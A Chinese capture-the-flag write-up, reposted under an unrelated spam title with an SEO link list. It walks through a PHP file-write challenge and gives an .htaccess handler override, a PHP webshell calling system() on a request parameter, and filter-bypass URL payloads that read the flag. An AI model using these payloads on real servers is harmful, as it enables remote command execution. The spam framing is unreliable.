当前位置: 首页 > news >正文

网站暂停怎么做宽城区建设局网站

news 2025/9/16 15:09:41
网站暂停怎么做,宽城区建设局网站,网站建设有哪些需求,广州景点进入靶场 <?php// 使用 scandir 函数扫描当前目录&#xff08;即脚本所在目录&#xff09;下的所有文件和文件夹// 该函数会返回一个包含目录下所有文件和文件夹名称的数组$files scandir(./); // 遍历扫描得到的文件和文件夹名称数组foreach($files as $file) {// 使用 …

进入靶场 

<?php// 使用 scandir 函数扫描当前目录(即脚本所在目录)下的所有文件和文件夹// 该函数会返回一个包含目录下所有文件和文件夹名称的数组$files = scandir('./'); // 遍历扫描得到的文件和文件夹名称数组foreach($files as $file) {// 使用 is_file 函数检查当前遍历到的元素是否为一个文件if(is_file($file)){// 检查当前文件是否不是 "index.php"if ($file !== "index.php") {// 如果不是 "index.php",则使用 unlink 函数删除该文件unlink($file);}}}// 检查 GET 请求中是否缺少 'content' 或 'filename' 参数if(!isset($_GET['content']) || !isset($_GET['filename'])) {// 如果缺少参数,使用 highlight_file 函数高亮显示当前脚本文件的源代码highlight_file(__FILE__);// 终止脚本执行die();}// 从 GET 请求中获取 'content' 参数的值,并赋值给 $content 变量$content = $_GET['content'];// 使用 stristr 函数检查 $content 中是否包含特定的敏感关键词// stristr 函数用于不区分大小写地查找字符串在另一个字符串中首次出现的位置if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {// 如果包含敏感关键词,输出 "Hacker" 提示信息echo "Hacker";// 终止脚本执行die();}// 从 GET 请求中获取 'filename' 参数的值,并赋值给 $filename 变量$filename = $_GET['filename'];// 使用 preg_match 函数检查 $filename 是否包含除小写字母和点号之外的字符// 正则表达式 "/[^a-z\.]/" 表示匹配除小写字母和点号之外的任意字符if(preg_match("/[^a-z\.]/", $filename) == 1) {// 如果包含非法字符,输出 "Hacker" 提示信息echo "Hacker";// 终止脚本执行die();}// 再次扫描当前目录下的所有文件和文件夹// 这一步重复前面的文件删除操作,确保在处理新文件之前目录中除了 "index.php" 没有其他文件$files = scandir('./'); foreach($files as $file) {if(is_file($file)){if ($file !== "index.php") {unlink($file);}}}// 使用 file_put_contents 函数将 $content 的内容追加 "Hello, world" 后写入指定的文件// 若文件不存在,会创建该文件;若存在,则会覆盖原有内容file_put_contents($filename, $content . "\nHello, world");
?>

 这段 PHP 代码的主要功能是先删除当前目录下除 index.php 之外的所有文件,然后检查 GET 请求中是否包含 content 和 filename 参数。如果参数存在,会进一步检查 content 中是否包含敏感关键词,以及 filename 是否包含非法字符。若都通过检查,会再次删除当前目录下除 index.php 之外的所有文件,最后将 content 内容追加 "Hello, world" 后写入指定的文件。

需要上传两个文件,一个.txt文件执行命令,一个.htaccess文件解析.txt文件

.htaccess

<FilesMatch "\.txt$">SetHandler application/x-httpd-php
</FilesMatch>

.txt

<?php
if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);
}
?>

?filename=.htaccess&content=php_value%20auto_prepend_fil%5C%0Ae%20.htaccess%0A%23%3C%3Fphp%20system('cat%20/fla?')%3B%3F%3E%5C

?content=php_value auto_prepend_fi\%0ale .htaccess%0a%23<?php system("cat /fl'a'g")?>\&filename=.htaccess

 

http://www.yayakq.cn/news/265730/

相关文章:

  • 网站开发主要学些什么网页设计网站的分析
  • 网站编程零基础入门本地wordpress卸载
  • 怎么搭建自己的网站挣钱素颜网站建设
  • 网站设计学习网怎样建个人网站
  • 做阿里巴巴还是做网站好wordpress 在线生成app
  • 网站中文名江西网站建设技术
  • 建设银行网站用户名是什么韶关做网站需要多少钱
  • 建瓯市建设银行网站门户网站管理建设
  • studio网站开发泉州企业网站制作
  • 帮企业做网站前景怎么样wordpress全站注明
  • 京东网站建设目标网站开发服务合同模板
  • 网站设计学什么专业阳江房产网签查询
  • 国内网站制作公司排名公司做网站 分录
  • 贵州建设监理协会网站广东官网网站建设公司
  • 电子商务网站建设作业案例鄂尔多斯市网站建设
  • 企业网站宣传视频外链企业全称网站
  • 门户网站建设方案的公司数字营销1+x
  • 网站建设免费维护文案策划的网站
  • 有记事本做简易网站照片视频制作软件app
  • 英文站友情链接去哪里查wordpress 客户端源码分析
  • 此网站域名即将过期ps工具设计网站
  • 做网站绑定域名 解析域名江苏威达建设有限公司网站
  • 网络营销第二版课后答案seo诊断报告怎么写
  • 可以直接进入的舆情网站阿里云空间+1对1私人专属设计师
  • .net网站 开发网站制作好如何上线
  • 哪个网站做外单出口好爬虫抓取大数据精准获客
  • 用织梦模板做网站网站模板下载简单的那种
  • 网站安全建设目的是帝国cms转wordpress
  • 长沙营销型网站建设公司网址大全4399
  • 燕郊的大型网站建设网站制作整个的流程是什么